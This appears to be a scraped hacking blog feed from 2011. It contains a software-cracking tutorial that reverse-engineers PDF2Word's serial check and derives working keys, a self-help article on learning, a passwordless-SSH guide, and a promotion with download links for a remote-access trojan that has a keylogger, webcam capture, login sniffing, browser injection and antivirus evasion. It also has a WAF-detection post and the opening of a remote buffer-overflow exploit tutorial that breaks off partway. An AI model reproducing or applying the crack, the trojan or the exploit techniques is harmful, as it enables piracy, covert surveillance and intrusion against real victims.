00429754 |. 885424 24 MOV BYTE PTR SS:[ESP+24],DL
00429758 |. 884C24 0C MOV BYTE PTR SS:[ESP+C],CL
0042975C |. 75 52 JNZ SHORT pdf2rtf.004297B0

I've copied the entire block until the first check of the serial above to safe space, so refer
to above code in this explanation.

1st line --> move our entered serial to ESI
2nd line --> not important
3rd line --> move the first byte (character) of our serial into AL
4th line --> move the second byte (first+1) of our serial into CL
5th line --> move the 13th byte (first+E) of our serial into DL
6th line --> move content of AL (first character of our serial) into [ESP+18]
7th line --> clear the contents of AL
8th line --> move the content of CL (second character) into [ESP+30]
9th line --> move the 14th byte (first+F) of our serial into CL
10th,11th,12th,13th line --> clear the contents of [ESP+19],[ESP+31],[ESP+25] & [ESP+D] since AL still is empty.
14th line --> move the third byte (first+2) of our serial into AL
15th line --> compare content of AL with 0x24 (hex for the $ sign)
16th line --> move the 13th byte of our serial into [ESP+24]
17th line --> move the 14th byte of our serial into [ESP+C]
18th line --> Jump to 004297B0 if AL is not equal to 24 ($ sign).

If you trace the jump in the 18th line you will see that it jumps to the following code:


004297B0 |> 5F POP EDI
004297B1 |. 5E POP ESI
004297B2 |. 33C0 XOR EAX,EAX
004297B4 |. 5D POP EBP
004297B5 |. 83C4 30 ADD ESP,30
004297B8 \. C3 RETN

Which means so much as restore values, set EAX to 0 and return from where we were called.
If we let this happen then EAX will be 0 which will give us the errormessage.

So what do we know now from this code?

- AL should be equal to 0x24 or we will get the errormessage
- the program moves the third character of our serial into AL before comparing it to 0x24
- the program moves the 14th byte of our serial into CL

from above we can conclude that the third character of our serial should be a $ sign and
that our serial should be at least 14 characters long since the 14th character is moved.

So our serial will be something like: ..$...........

It's time for the next piece of code:


0042975E |. 8B3D 4C964400 MOV EDI,DWORD PTR DS:[<&MSVCRT.atoi>] ; msvcrt.atoi
00429764 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
00429768 |. 52 PUSH EDX  ; /s
00429769 |. FFD7 CALL EDI  ; \atoi
0042976B |. 8BE8 MOV EBP,EAX
0042976D |. 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
00429771 |. 50 PUSH EAX
00429772 |. FFD7 CALL EDI
00429774 |. 03E8 ADD EBP,EAX
00429776 |. 83C4 08 ADD ESP,8
00429779 |. 83FD 0A CMP EBP,0A
0042977C |. 75 32 JNZ SHORT pdf2rtf.004297B0

Let's analyze it:

1st line --> move the address of the function MSVCRT.atoi to EDI
atoi is a function which converts ASCII characters to integers (numbers).
2nd line --> put the 16th byte of our serial into EDI
3rd line --> push our byte to the stack as an argument to atoi
4th line --> call atoi. the result will be in EAX
5th line --> move content of EAX into EBP
6th line --> move the first byte of our serial into EAX
7th line --> push our byte to the stack as an argument to atoi
8th line --> call atoi. the result will be in EAX
9th line --> add EAX to EBP and store the result in EBP
10th line --> not important to us
11th line --> compare EBX with the value 0x0A (10)
12th line --> if EBX is not 0x0A then jump to 004297B0 (put 0 into EAX and return).

NOTE:You probably wonder how I figured out which byte is used to put into atoi, well here
it is: I've put in serials multiple times with different digits as values and compared them to
the output of atoi in EAX. This resulted in the corresponding bytes.

What do we know from this code?
- our 16th byte is put into EDI, this means that our serial must be at least 16 characters long
- the 16th byte is put into atoi, which means it much have a value between 0-9
- the 1st byte is put into atoi as well, which also means it must have a value between 0-9
- the value of our first byte is added to the value of our 16th byte and together they must be
equal to 0xA (10).

So now we have the following serial: 1.$............9
as you can imagine the values of our 1st and 16th byte can be anything as long as they both
are digits and when added to eachother are equal to 10 decimal.

Time for the next piece of code:


0042977E |. 8D4C24 24 LEA ECX,DWORD PTR SS:[ESP+24]
00429782 |. 51 PUSH ECX
00429783 |. FFD7 CALL EDI
00429785 |. 8D5424 34 LEA EDX,DWORD PTR SS:[ESP+34]
00429789 |. 8BE8 MOV EBP,EAX
0042978B |. 52 PUSH EDX
0042978C |. FFD7 CALL EDI
0042978E |. 03E8 ADD EBP,EAX
00429790 |. 83C4 08 ADD ESP,8
00429793 |. 83FD 0A CMP EBP,0A
00429796 |. 75 18 JNZ SHORT pdf2rtf.004297B0

Let's analyze it:

1st line --> our 15th byte is put into ECX
2nd line --> push our byte to the stack as an argument to atoi
3rd line --> call atoi. the result will be in EAX
4th line --> our 2nd byte is put into EDX
5th line --> move the result of atoi into EBP
6th line --> push our 2nd byte to the stack as an argument to atoi
7th line --> call atoi. the result will be in EAX
8th line --> add the result of our 15th and 2nd byte together and store in EBP
9th line --> not important to us.
10th line --> check if our 15th byte + our 2nd byte added together is equal to 0x0A (10).
11th line --> if not, then another jump to 004297B0

As you can see this code is very similar to the codeblock before, so I won't explain it any
further.

Now we have the following serial: 12$...........89
We still need to analyze some code, but we're getting somewhere ;-)

Lets take a look at the final piece of code from this call:


00429798 |. 807E 03 24 CMP BYTE PTR DS:[ESI+3],24
0042979C |. 75 12 JNZ SHORT pdf2rtf.004297B0
0042979E |. 8A4E 05 MOV CL,BYTE PTR DS:[ESI+5]
004297A1 |. 33C0 XOR EAX,EAX
004297A3 |. 80F9 23 CMP CL,23
004297A6 |. 5F POP EDI
004297A7 |. 5E POP ESI
004297A8 |. 5D POP EBP
004297A9 |. 0F94C0 SETE AL
004297AC |. 83C4 30 ADD ESP,30
004297AF |. C3 RETN

Analysis:

1st line --> since ESI still contains our serial, the 4th byte is now checked against value 0x24
2nd line --> if not equal, then goto the famous 004297B0
3rd line --> move our 6th byte to CL
4th line --> check if our 6th byte is equal to 0x23 (# sign)
5th,6th,7th line --> not important
8th line --> sets the byte in AL to 1 if our check above is equal
9th line --> not important
10th line --> return to where this call was called from.

What we see here is that our 4th byte is compared to 0x24 ($ sign remember?) as well and that
the 6th byte is compared to 0x23 (the # sign).

If that is correct then AL is set to 1 meaning EAX won't be 0 and so causing the program to
give the registered message.

In short:

-check if 3th == $
-check if 1st + 16th == 10
-check if 15th + 2nd == 10
-check if 4th == $
-check if 6th == #

All other characters are of no importance to create a valid serial so our result will be:

12$$.#........89

You can fill in the remaining dots with anything you like and as long as the rules above are
correct you can change the 1th,2nd,15th and 16th byte as well.

Now close OllyDbg and start PDF2Word.
Enter your email-address and enter one of your newly created serials.

When you press ok you will be thanked for registrering. You're welcome ;-)
The result of your entered information is put in a string and written to
%WINDIR%\system32\pdf2word.dat

In case you want another serial just delete the dat file and put in a new one.

Of course this is a very simple protection, but it is a nice example to cover the basics of
reverse engineering.

Hacking Mind, Learn Faster, Be Smart

noreply@blogger.com (h4ckfreak) — Sat, 27 Aug 2011 10:32:00 +0000

If someone granted you one wish, what do you imagine you would want out of life that you haven't gotten yet? For many people, it would be self-improvement and knowledge. New knowledge is the backbone of society's progress. Great thinkers such as Leonardo da Vinci, Thomas Edison, Benjamin Franklin, Albert Einstein, and others' quests for knowledge have led society to many of the marvels we enjoy today. Your quest for knowledge doesn't have to be as Earth-changing as Einstein's, but it can be an important part of your life, leading to a new job, better pay, a new hobby, or simply knowledge for knowledge's sake — whatever is important to you as an end goal. Life-changing knowledge does typically require advanced learning techniques. In fact, it's been said that the average adult only uses 10% of his/her brain. Imagine what we may be capable of with more advanced learning techniques. Here are 77 tips related to knowledge and learning to help you on your quest. A few are specifically for students in traditional learning institutions; the rest for self-starters, or those learning on their own. Happy learning.

Health

Shake a leg. Lack of blood flow is a common reason for lack of concentration. If you've been sitting in one place for awhile, bounce one of your legs for a minute or two. It gets your blood flowing and sharpens both concentration and recall.
Food for thought: Eat breakfast. A lot of people skip breakfast, but creativity is often optimal in the early morning and it helps to have some protein in you to feed your brain. A lack of protein can actually cause headaches.
Food for thought, part 2: Eat a light lunch. Heavy lunches have a tendency to make people drowsy. While you could turn this to your advantage by taking a "thinking nap" (see #23), most people haven't learned how.
Cognitive enhancers: Ginkgo biloba. Ginkgo biloba is a natural supplement that has been used in China and other countries for centuries and has been reputed to reverse memory loss in rats. It's also suggested by some health practitioners as a nootrope and thus a memory enhancer.
Reduce stress + depresssion. Stress and depression may reduce the ability to recall information and thus inhibit learning. Sometimes, all you need to reduce depression is more white light and fewer refined foods.

Balance

Sleep on it. Dr. Maxwell Maltz wrote about in his book Psycho-Cybernetics about a man who was was paid good money to come up with ideas. He would lock his office door, close the blinds, turn off the lights. He'd focus on the problem at hand, then take a short nap on a couch. When he awoke, he usually had the problem solved.
Take a break. Change phyical or mental perspective to lighten the invisible stress that can sometimes occur when you sit in one place too long, focused on learning. Taking a 5-15 minute break every hour during study sessions is more beneficial than non-stop study. It gives your mind time to relax and absorb information. If you want to get really serious with breaks, try a 20 minute ultradian break as part of every 90 minute cycle. This includes a nap break, which is for a different purpose than #23.
Take a hike. Changing your perspective often relieves tension, thus freeing your creative mind. Taking a short walk around the neighborhood may help.
Change your focus. Sometimes there simply isn't enough time to take a long break. If so, change subject focus. Alternate between technical and non-technical subjects.

Perspective and Focus

Change your focus, part 2. There are three primary ways to learn: visual, kinesthetic, and auditory. If one isn't working for you, try another.
Do walking meditation. If you're taking a hike (#25), go one step further and learn walking meditation as a way to tap into your inner resources and your strengthen your ability to focus. Just make sure you're not walking inadvertently into traffic.
Focus and immerse yourself. Focus on whatever you're studying. Don't try to watch TV at the same time or worry yourself about other things. Anxiety does not make for absorption of information and ideas.
Turn out the lights. This is a way to focus, if you are not into meditating. Sit in the dark, block out extraneous influences. This is ideal for learning kinesthetically, such as guitar chord changes.
Take a bath or shower. Both activities loosen you up, making your mind more receptive to recognizing brilliant ideas.

Recall Techniques

Listen to music. Researchers have long shown that certain types of music are a great "key" for recalling memories. Information learned while listening to a particular song or collection can often be recalled simply by "playing" the songs mentally.
Speedread. Some people believe that speedreading causes you to miss vital information. The fact remains that efficient speedreading results in filtering out irrelevant information. If necessary, you can always read and re-read at slower speeds. Slow reading actually hinders the ability to absorb general ideas. (Although technical subjects often requirer slower reading.) If you're reading online, you can try the free Spreeder Web-based application.
Use acronyms and other mnemonic devices. Mnemonics are essentially tricks for remembering information. Some tricks are so effective that proper application will let you recall loads of mundane information years later.

Visual Aids

Every picture tells a story. Draw or sketch whatever it is you are trying to achieve. Having a concrete goal in mind helps you progress towards that goal.
Brainmap it. Need to plan something? Brain maps, or mind maps, offer a compact way to get both an overview of a project as well as easily add details. With mind maps, you can see the relationships between disparate ideas and they can also act as a receptacle for a brainstorming session.
Learn symbolism and semiotics. Semiotics is the study of signs and symbols. Having an understanding of the symbols of a particular discipline aids in learning, and also allows you to record information more efficiently.
Use information design. When you record information that has an inherent structure, applying information design helps convey that information more clearly. A great resource is Information Aesthetics, which gives examples of information design and links to their sources.
Use visual learning techniques. Try gliffy for structured diagrams. Also see Inspiration.com for an explanation of webs, idea maps, concept maps, and plots.
Map your task flow. Learning often requires gaining knowledge in a specific sequence. Organizing your thoughts on what needs to be done is a powerful way to prepare yourself to complete tasks or learn new topics.

Verbal and Auditory Techniques

Stimulate ideas. Play rhyming games, utter nonsense words. These loosen you up, making you more receptive to learning.
Brainstorm. This is a time-honored technique that combines verbal activity, writing, and collaboration. (One person can brainstorm, but it's more effective in a group.) It's fruitful if you remember some simple rules: Firstly, don't shut anyone's idea out. Secondly, don't "edit" in progress; just record all ideas first, then dissect them later. Participating in brainstorming helps assess what you already know about something, and what you didn't know.
Learn by osmosis. Got an iPod? Record a few of your own podcasts, upload them to your iPod and sleep on it. Literally. Put it under your pillow and playback language lessons or whatever.
Cognitive enhancers: binaural beats. Binaural beats involve playing two close frequencies simultaneously to produce alpha, beta, delta, and theta waves, all of which produce either sleeping, restfulness, relaxation, meditativeness, alertness, or concentration. Binaural beats are used in conjunction with other excercises for a type of super-learning.
Laugh. Laughing relaxes the body. A relaxed body is more receptive to new ideas.

Kinesthetic Techniques

Write, don't type. While typing your notes into the computer is great for posterity, writing by hand stimulates ideas. The simple act of holding and using a pen or pencil massages acupuncture points in the hand, which in turn stimulates ideas.
Carry a quality notebook at all times. Samuel Taylor Coleridge dreamed the words of the poem "In Xanadu (did Kubla Khan)...". Upon awakening, he wrote down what he could recall, but was distracted by a visitor and promptly forgot the rest of the poem. Forever. If you've been doing "walking meditation" or any kind of meditation or productive napping, ideas may suddenly come to you. Record them immediately.
Keep a journal. This isn't exactly the same as a notebook. Journaling has to do with tracking experiences over time. If you add in visual details, charts, brainmaps, etc., you have a much more creative way to keep tabs on what you are learning.
Organize. Use sticky colored tabs to divide up a notebook or journal. They are a great way to partition ideas for easy referral.
Use post-it notes. Post-it notes provide a helpful way to record your thoughts about passages in books without defacing them with ink or pencil marks.

Self-Motivation Techniques

Give yourself credit. Ideas are actually a dime a dozen. If you learn to focus your mind on what results you want to achieve, you'll recognize the good ideas. Your mind will become a filter for them, which will motivate you to learn more.
Motivate yourself. Why do you want to learn something? What do want to achieve through learning? If you don't know why you want to learn, then distractions will be far more enticing.
Set a goal. W. Clement Stone once said "Whatever the mind of man can conceive, it can achieve." It's an amazing phenomenon in goal achievement. Prepare yourself by whatever means necessary, and hurdles will seem surmountable. Anyone who has experienced this phenomenon understands its validity.
Think positive. There's no point in setting learning goals for yourself if you don't have any faith in your ability to learn.
Organize, part 2. Learning is only one facet of the average adult's daily life. You need to organize your time and tasks else you might find it difficult to fit time in for learning. Try Neptune for a browser-based application for "getting things done."
Every skill is learned. With the exception of bodily functions, every skill in life is learned. Generally speaking, if one person can learn something, so can you. It may take you more effort, but if you've set a believable goal, it's likely an achievable goal.
Prepare yourself for learning. Thinking positive isn't sufficient for successfully achieving goals. This is especially important if you are an adult, as you'll probably have many distractions surrounding your daily life. Implement ways to reduce distractions, at least for a few hours at a time, else learning will become a frustrating experience.
Prepare yourself, part 2. Human nature is such that not everyone in your life will be a well-wisher in your self-improvement and learning plans. They may intentionally or subconsciously distract you from your goal. If you have classes to attend after work, make sure that work colleagues know this, that you are unable to work late. Diplomacy works best if you think your boss is intentionally giving you work on the days he/she knows you have to leave. Reschedule lectures to a later time slot if possible/ necessary.
Constrain yourself. Most people need structure in their lives. Freedom is sometimes a scary thing. It's like chaos. But even chaos has order within. By constraining yourself — say giving yourself deadlines, limiting your time on an idea in some manner, or limiting the tools you are working with — you can often accomplish more in less time.

Supplemental Techniques

Read as much as you can. How much more obvious can it get? Use Spreeder (#33) if you have to. Get a breadth of topics as well as depth.
Cross-pollinate your interests. Neurons that connect to existing neurons give you new perspectives and abilities to use additional knowledge in new ways.
Learn another language. New perspectives give you the ability to cross-pollinate cultural concepts and come up with new ideas. As well, sometimes reading a book in its original language will provide you with insights lost in translation.
Learn how to learn. Management Help has a resource page, as does SIAST (Virtual Campus), which links to articles about learning methods. They are geared towards online learning, but no doubt you gain something from them for any type of learning. If you are serious about optimum learning, read Headrush's Crash course in learning theory.
Learn what you know and what you don't. Many people might say, "I'm dumb," or "I don't know anything about that." The fact is, many people are wholly unaware of what they already know about a topic. If you want to learn about a topic, you need to determine what you already know, figure out what you don't know, and then learn the latter.
Multi-task through background processes. Effective multi-tasking allows you to bootstrap limited time to accomplish several tasks. Learning can be bootstrapped through multi-tasking, too. By effective multitasking, I don't mean doing two or more things at exactly the same time. It's not possible. However, you can achieve the semblance of effective multitasking with the right approach, and by prepping your mind for it. For example, a successful freelance writer learns to manage several articles at the same time. Research the first essay, and then let the background processes of your mind takeover. Move on consciously to the second essay. While researching the second essay, the first one will often "write itself." Be prepared to record it when it "appears" to you.
Think holistically. Holistic thinking might be the single most "advanced" learning technique that would help students. But it's a mindset rather than a single technique.
Use the right type of repetition. Complex concepts often require revisting in order to be fully absorbed. Sometimes, for some people, it may actually take months or years. Repetition of concepts and theory with various concrete examples improves absorption and speeds up learning.
Apply the Quantum Learning (QL) model. The Quantum Learning model is being applied in some US schools and goes beyond typical education methods to engage students.
Get necessary tools. There are obviously all kinds of tools for learning. If you are learning online like a growing number of people these days, then consider your online tools. One of the best tools for online research is the Firefox web browser, which has loads of extensions (add-ons) with all manner of useful features. One is Googlepedia, which simultaneously displays Google search engine listings, when you search for a term, with related entries from Wikipedia.
Get necessary tools, part 2. This is a very niche tip, but if you want to learn fast-track methods for building software, read Getting Real from 37 Signals. The Web page version is free. The techniques in the book have been used to create Basecamp, Campfire, and Backpack web applications in a short time frame. Each of these applications support collaboration and organization.
Learn critical thinking. As Keegan-Michael Key's character on MadTV might say, critical thinking takes analysis to "a whole notha level". Read Wikipedia's discourse on critical thinking as a starting point. It involves good analytical skills to aid the ability to learn selectively.
Learn complex problem solving. For most people, life is a series of problems to be solved. Learning is part of the process. If you have a complex problem, you need to learn the art of complex problem solving. [The latter page has some incredible visual information.]

For Teachers, Tutors, and Parents

Be engaging. Lectures are one-sided and often counter-productive. Information merely heard or witnessed (from a chalkboard for instance) is often forgotten. Teaching is not simply talking. Talking isn't enough. Ask students questions, present scenarios, engage them.
Use information pyramids. Learning happens in layers. Build base knowledge upon which you can add advanced concepts.
Use video games. Video games get a bad rap because of certain violent games. But video games in general can often be an effective aid to learning.
Role play. Younger people often learn better by being part of a learning experience. For example, history is easier to absorb through reenactments.
Apply the 80/20 rule. This rule is often interpreted in dfferent ways. In this case, the 80/20 rule means that some concepts, say about 20% of a curriculum, require more effort and time, say about 80%, than others. So be prepared to expand on complex topics.
Tell stories. Venus Flytrap, a character from the sitcom WKRP in Cincinnati, once taught a student gang member about atoms, electrons, and protons by saying that an atom was one big neighborhood, and the protons and neutrons had their own smaller neighborhoods and never mixed. Just like rival gangs. The story worked, and understanding sparked in the students eyes.
Go beyond the public school curriculum. The public school system is woefully lacking in teaching advanced learning and brainstorming methods. It's not that the methods cannot be taught; they just aren't. To learn more, you have to pay a premium in additional time and effort, and sometimes money for commercially available learning tools. There's nothing wrong with that in itself, but what is taught in schools needs to be expanded. This article's author has proven that a nine-year old can learn (some) university level math, if the learning is approached correctly.
Use applied learning. If a high school student were having trouble in math, say with fractions, one example of applied learning might be photography, lenses, f-stops, etc. Another example is cooking and measurement of ingredients. Tailor the applied learning to the interest of the student.

For Students and Self-Studiers

Be engaged. Surprise. Sometimes students are bored because they know more than is being taught, maybe even more than a teacher. (Hopefully teachers will assess what each student already knows.) Students should discuss with a teacher if they feel that the material being covered is not challenging. Also consider asking for additional materials.
Teach yourself. Teachers cannot always change their curricula. If you're not being challenged, challenge yourself. Some countries still apply country-wide exams for all students. If your lecturer didn't cover a topic, you should learn it on your own. Don't wait for someone to teach you. Lectures are most effective when you've pre-introduced yourself to concepts.
Collaborate. If studying by yourself isn't working, maybe a study group will help.
Do unto others: teach something. The best way to learn something better is to teach it to someone else. It forces you to learn, if you are motivated enough to share your knowledge.
Write about it. An effective way to "teach" something is to create an FAQ or a wiki containing everything you know about a topic. Or blog about the topic. Doing so helps you to realize what you know and more importantly what you don't. You don't even have to spend money if you grab a freebie account with Typepad, Wordpress, or Blogger.
Learn by experience. Pretty obvious, right? It means put in the necessary time. An expert is often defined as someone who has put in 10,000 hours into some experience or endeavor. That's approximately 5 years of 40 hours per week, every week. Are you an expert without realizing it? If you're not, do you have the dedication to be an expert?
Quiz yourself. Testing what you've learned will reinforce the information. Flash cards are one of the best ways, and are not just for kids.
Learn the right things first. Learn the basics. Case in point: a frustrating way to learn a new language is to learn grammar and spelling and sentence constructs first. This is not the way a baby learns a language, and there's no reason why an adult or young adult has to start differently, despite "expert" opinion. Try for yourself and see the difference.
Plan your learning. If you have a long-term plan to learn something, then to quote Led Zeppelin, "There are two paths you can go by." You can take a haphazard approach to learning, or you can put in a bit of planning and find an optimum path. Plan your time and balance your learning and living.

Parting Advice

Persist. Don't give up learning in the face of intimdating tasks. Anything one human being can learn, most others can as well. Wasn't it Einstein that said, "Genius is 1% inspiration and 99% perspiration"? Thomas Edison said it, too.
Defy the experts. Dyslexia, in a nutshell, is the affliction of mentally jumbling letters and digits, causing difficulties in reading, writing and thus learning. Sometimes spoken words or numbers get mixed up as well. In the past, "experts" declared dyslexic children stupid. Later, they said they were incapable of learning. This author has interacted with and taught dyslexic teens. It's possible. Helen Keller had no experience of sight, sound, or speech, and yet she learned. Conclusion: There is more than one way to learn; never believe you cannot.
Challenge yourself. People are often more intelligent than they realize. In a world that compartmentalizes and categorizes everything, not everyone is sure where they fit in. And genius can be found in many walks of life. If you honestly suspect that there's more to you than has been "allowed" to be let out, try an IQ test such as the one offered by MENSA. It's unlike the standardized IQ tests given in many schools. You know the kind — the ones which traumatize many young students into thinking they are stupid, simply because the tests don't really assess all student's knowledge and learning ability. And the ability to learn is far, far more important than what you already know.
Party before an exam. Well, don't go that far. The key is to relax. The worse thing to do is cram the night before an exam. If you don't already know a subject by then, cramming isn't going to help. If you have studied, simply review the topic, then go do something pleasant (no more studying). Doing so tells your brain that you are prepared and that you will be able to recall anything that you have already learned. On the other hand, if you didn't spend the semester learning the ideas you need, you might as well go party anyways because cramming at the last minute isn't going to help much at that point.
Don't worry; learn happy. Have a real passion for learning

Configure SSH Without Password Login Prompt

noreply@blogger.com (h4ckfreak) — Sat, 27 Aug 2011 10:19:00 +0000

Password less SSH login to another server can be very useful when you want to configure a remote backup server or when migrating servers. For enabling this you need to have openSSH installed on the server. Here is a tutorial on how to configure password less SSH login to server ‘mars’ from server ‘earth’
1. Login to earth as root.
2. Run the command ssh-keygen -t rsa
If the key already exists you can either go to step 3 or you can generate a new key by overwriting existing key (see image). It would be better to overwrite the existing key if you did not generate it.

3. Change directory to /root/.ssh/
root@earth:~# cd /root/.ssh/
root@earth:~/.ssh#
4. Copy the contents of the file id_rsa.pub to the directory /root/.ssh/authorized_keys
scp -P id_rsa.pub root@mars_server_IP:/root/.ssh/authorized_keys
5. You will be able to login to the remote server ‘mars’ by typing ssh root@mars_server_IP -p without password now
Creating Sudo user to login as root:
1. Login to server as root
2. Create a new user by using the command
root@server:~# useradd user
3. Assign a password for the user by using the command
root@server:~# passwd user
4. Add the user to the admin group in /etc/groups
root@server:~# vi /etc/groups
admin:x:121:user1,user2

F.B.I RAT (Full Backdoor Intergration) V0.1

noreply@blogger.com (h4ckfreak) — Fri, 26 Aug 2011 17:23:00 +0000

Supports xp/Vista/Windows 7, all features have been tested on these OS's including injection, but there have been some limitations on the sniffer.

Features:

File Manager:
-Execute, Normal & Hidden.
-Copy & Paste like Windows explorer.
-Display size of file, and type.
-Delete.
-Download & Upload (re-coded) Multi-threaded downloads, which allows you to download multiple files at once.
-Stop, Pause and resume active transfer's.
-Search files.
-rename files.

System Manager:
-Process Manager - Refresh and kill processes running
-Window Manager - Refresh and close windows, shows hidden and visable windows.
-Installed Programs - List's program name and Directory.
-Installed Services - Lists installed services, allows you to stop, start and pause services.

Keylogger:
-Allows the user to have a time & date stamp, and active window, as well as custom colour coding.
-Uses a keyboard hook, so no dropped keys like most keyloggers, and 0 CPU usage.
-Offline and Online keylogs, Offline keylogs are downloaded once you start the Online keylogger, and once the online keylogger session has finished, the offline keylogger begins again.

Screen capture:
-Reworked transfer & Capture.
-Allows the user to select the quality, intervals of screen shots and stop & start screen capture, also allows the user to take a single snapshot when ever they want.

Webcam:
-Reworked transfer & Capture.
-Allows the user to stop & start captures also allows an interval for the sending of captures.

Packet Sniffer:
-"Net stat" Allows the user to view local connections on the computer, and then select which connection you want to sniff, displays remote server IP and local IP & Port information, also the state of the connection, all this information comes from the TCP stack of windows.
-Packet sniffer, sniffs the raw packets, using windows RAW sockets and formats them into text for you to read, i have tested this with Real world websites, and has allowed me to steal information, such as website logins, but because of the limitations of vista and windows 7 it is likely it will not work, for those two operating systems.

Choice of injection, This source comes with another project that allows you to inject your server into the default browser of the Victim, you can also use the exe and run it normally withoutinjection, for testing, the injection code has been modified from an old source i found, i took the source and improved it, made it detect the default browser and made it load the API's indirectly, so you can encrypt the API strings, and bypass AV's.

Pic:
http://i50.tinypic.com/2qunm07.jpg

Download

If the Link is Broken Check this one too thanks For the anonymous

http://www.megaupload.com/?d=ROHUUZO7

Detecting Web application firewall during Pentesting

noreply@blogger.com (h4ckfreak) — Sat, 20 Aug 2011 21:00:00 +0000

It has Always been overlooked by Penetration Testers while Testing Web Applications, most of the Web Applications are Protected by Application firewall & it is not so easy to find which firewall has been using,here comes a tool “WAFW00F” which can fingerprint 20 WAF products this helps a Pentester to find and analyse the WebApplication.

http://code.google.com/p/waffit/

WAFW00F allows you fingerprint WAF products protecting a website. The tool as of now can fingerprint 20 WAF products. How can it do that? Possibly, it is looking at the following:

* Cookies – Some WAF products add their own cookie in the HTTP communication.
* Server Cloaking – Altering URLs and Response Headers.
* Response Codes – Different error codes for hostile pages/parameters values.
* Drop Action – Sending a FIN/RST packet. This can also be a false positive for an IDS/IPS.
* Pre Built-In Rules – Each WAF has different negative security signatures. A study is done of all them WAF products.
Below is the test Conducted on Modsecurity its an Open Source Firewall
1) root@hackfreak:~$svn checkout waffit – Revision 11: /trunk waffit-read-only
2) root@hackfreak:~$cd to that downloaded directory cd /pentest/web/waffit-read-only#
3) root@hackfreak:~$python wafw00f.py http://192.168.0.122–>
punter@rtfm:~$ python wafw00f.py http://192.168.0.122
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.’ \ / __////7/ /,’ \ ,’ \ / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,’/_n_//_/ |_n_,’ \_,’ \_,’/_/
<
…’
WAFW00F – Web Application Firewall Detection Tool
By Sandro Gauci && Wendel G. Henrique
Checking http://192.168.0.122
The site http://192.168.0.122 is behind a ModSecurity
Number of requests: 5

Thanks

Basics of remote exploits writing

noreply@blogger.com (h4ckfreak) — Sat, 20 Aug 2011 20:52:00 +0000

Many Peoples are Prefering to use the Publicly Available Exploits than Writing their Own..! Let me ask them Why u cant write ur Own Exploits For ur Attack(I am Just Curious about Exploits ,Some exploits available will work only on Specified Service Packs Or Might Not Work If it has been Patched Or Recently Updated)..So I started almost a couple of weeks to go for reading about metaX ,Thanks for Shobit(Hackersbay) for Sharing the Book..Which Helped me a lot to learn, and am
Just has digged my head Into The Ocean Of Exploits Writing i Want to show you all Whaat i Been Doing all Day in a week , i hope my Last post regarding Xploit Writing Complete Tuts and Links But this regarding a Going Forward With the Example ..SO In order to understand the following Posts and Code u shud know c and c++ , I hope that you know "socket programming in C", also ANSI C, I want to suggest you to first read other papers Probalby from Exploits DB or books like…:

The C Programming language (Kernighan/Ritchie)

Unix Network Programming (Richard Stevens)

Good tutorials about exploits you can find on(EXPLOITS-DB I always Prefer that)

2. Let’s discover the exercise
I hope you’ll enjoy it, ok what are we going to do? We want to exploit a vulnerable server program (vulnerable.c). We want to get a remote shell. In case you are looking for an exercise, read the vulnerable.c program, compile it and try to exploit it. If you don’t have any clue about remote exploits…… well then read further and let us first take a look at the vulnerable program… later we want to look at the functions of the vulnerable program, then how we can abuse an overflow within the program, then we want to define the general structure of the exploit code, and at last we want to write an exploit…

-------------------------------------------- vulnerable.c ----------------------------------------------

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)
{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "My name is: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1] = ’\0’;
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;
}

int main(int argc, char *argv[])
{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, &cli, &cli_size);
if (c == -1)
{
perror("accept() failed");
return 5;
}
printf("client from %s", inet_ntoa(cli.sin_addr));
if (handling(c) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(c);
}
return 0;
}
---------------------------------------------- EOF------------------------------------------------------
Here’s how you must compile and use the program.
user@hackfreak:~/ > gcc vulnerable.c -o vulnerable
user@hackfreak:~/ > ./vulnerable 8080
./vulnerable 8080 this means, that you run the service on port 8080, look at the port you wanna take, you mustn’t use a privileged port (1 – 1024) assuming you are not root.
Now we’ve compiled the program and we know how to run it.. with the parameter
program <port>
Now we want check some addresses of the program, and take a look on how it is built. We start the vulnerable program with gdb, to look at some things…

now do the following:
user@lhackfreak~/ > gdb vulnerable
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) run 8080
Starting program: /home/user/directory/vulnerable 8080
Now the program is listening for an incoming connection on port 8080.
Next connect with telnet or netcat on port 8080.
user@hackfreak:~/ > telnet localhost 8080
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
My name is:Suren
, nice to meet you!
Connection closed by foreign host.
user@hackfreak:~/ >
Now the easy server program doesn’t make anything else then getting a name and writing it back on your screen…. Ok let’s go further…
While you made this, the gdb (debugger) wrote the following on the screen:
client from 127.0.0.1 0xbffff28c
/*Don’t be confused if the address is different on your computer, on my box it is 0xbffff28c */
Ok the server is still running because of the for-loop, so it’s always repeating until you kill the server program.
3. Overflowing the server program
Let's test something....
Now we reconnect to the service on port 8080 and put more than 1024 bytes of characters on the command line "My name is:..."
It should look like this... (I'll take A's *g*)...
user@hackfreak:~/ > telnet localhost 8080
Trying ::1...
